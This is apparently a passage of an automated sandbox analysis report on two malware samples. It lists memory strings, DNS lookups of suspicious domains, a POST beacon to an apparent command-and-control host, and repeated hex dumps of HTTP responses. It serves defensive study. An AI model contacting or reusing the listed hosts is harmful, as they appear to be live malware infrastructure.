            Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: DB15.exe, 00000013.00000003.2940093378.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: DB15.exe, 00000011.00000003.2940501375.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
            Source: DB15.exe, 00000013.00000003.2940777429.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: trad-einmyus.com
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Thu, 28 Mar 2024 16:51:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:44:22 GMTAccept-Ranges: bytesContent-Length: 744Vary: Accept-EncodingContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 28 Mar 2024 16:51:25 GMTContent-Type: text/html; charset=utf-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-ttReferrer-Policy: originX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=512=dmDo8OUs1Dh_SH2CoFYz06Eio_Ao_PKWwCOGf0G4r33OGV2xphJa0LlfSc1X5XJqO5CfTRsHV5wK875xl0PkQQilAqO8Wq5JKQmBdu1c4EMDiEndK2XcoiA2onhuuBtr8m19WMevgUR8bvIldS8IH9CmAMTkZBZMtR3QsOGd2TE; expires=Fri, 27-Sep-2024 16:51:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 16:51:31 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 235Connection: closeCF-Ray: 86b92018ade12099-IADCF-Cache-Status: EXPIREDAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 28 Mar 2025 16:51:31 GMTVary: Accept-Encodingalt-svc: h3=":443"; ma=86400x-guploader-uploadid: ABPtcPo3f-t4OqZUlu8FHazd44yaLA1o9wXw6zs9SGp0miVAry0RuU9Rm2eTFlvDGAFdzgep9jfRJAE5HQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=GuqLQwTbDEsJ74Kqqr9XrNs0IzF1P7Oi4yY5Dgquclo-1711644691-1.0.1.1-UYDHBONP..JMKy.YZo_AuDEXN0vfKEyN3WY8WzTHGb4lSIwFSUdRKe6wiMciG.9tlWZnFPfRV0acUDYf1HIXvA; path=/; expires=Thu, 28-Mar-24 17:21:31 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DP75H5rgiATZrlkDmYbjwS5kqCgBOu65gNeYcIRphlWh53z0OCzaS0av9Av08WVbMrm7snO3c6prX7PqjYgUVpXkKZWhpX%2B3QNIBSvgXhPRffXPzt6VDWsmURGm0jBKSiZr%2FIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=rEeEjDGTiGP2KazGOQqzDfjp3ZL6UsTD6OT1PnC0qDM-1711644691388-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:12 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 38 0d 0a 04 00 00 00 79 fa f6 10 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:12 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:14 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 34 46 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4F73|"s2h3T'cSc"8iz`;?Dt0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:14 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:15 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:15 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:16 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 32 43 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2CI:82O@c^`_S10
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:04 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:04 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 